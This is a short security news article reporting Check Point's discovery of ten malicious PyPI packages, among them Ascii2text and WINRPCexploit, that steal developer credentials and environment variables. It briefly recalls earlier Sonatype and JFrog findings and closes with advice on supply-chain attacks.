10 malicious PyPI packages used to steal developer dataSecurity Affairs
10 packages were removed from the Python Package Index (PyPI) because they were found harvesting data.
Check Point researchers discovered ten malicious packages on the Python Package Index (PyPI). The packages install information stealers that allow hackers to steal developers’ private data and personal credentials.
The researchers provide details of the malicious packages:
- Ascii2text is a malicious package that mimics the folk art package in name and description. The code in the __init__.py file downloads and executes a malicious script that searches for local passwords and downloads them using a Discord web hook.
- Pyg-utils, Pymocks and PyProto2 are malicious packages that allow attackers to steal users’ AWS credentials.
- free-net-vpn and free-net-vpn2 are malicious packages developed to target environment variables.
- asynchronous-test downloads and executes malicious payloads.
- ZlibsrcName downloads and executes malicious payloads.
- free-net-vpn and free-net-vpn2 are malicious packages that target environment variables.
- WINRPCexploit a malicious package that steals user credentials as part of its setup.py installation script.
- Navigatordiv is able to steal installers’ credentials by harvesting them and sending them to a predefined Discord webhook.
Unfortunately, in recent months, many other malicious packages have been found on the official PyPI repository.
In June 2022, Sonatype researchers discovered several Python packages in the official PyPI repository that were developed to steal secrets (i.e. AWS credentials and environment variables) and download them also on a publicly exposed endpoint.
In November 2021, JFrog researchers discovered 11 malicious Python packages in the Python Package Index (PyPI) repository that can steal Discord access tokens, passwords, and even lead dependency confusion attacks.
“Supply chain attacks are designed to exploit trust relationships between an organization and external parties. These relationships may include partnerships, vendor relationships, or the use of third-party software. Cyber threat actors compromise an organization and then move up the supply chain, taking advantage of these trusted relationships to gain access to the environments of other organizations. concludes the report. “These attacks have become more frequent and have had an increased impact in recent years, so it is essential that developers ensure the security of their actions, by double-checking each software ingredient used and in particular those downloaded from from different repositories, especially those that weren’t self-created.
Follow me on Twitter: @securityaffairs and Facebook
(Security cases – hacking, PyPI)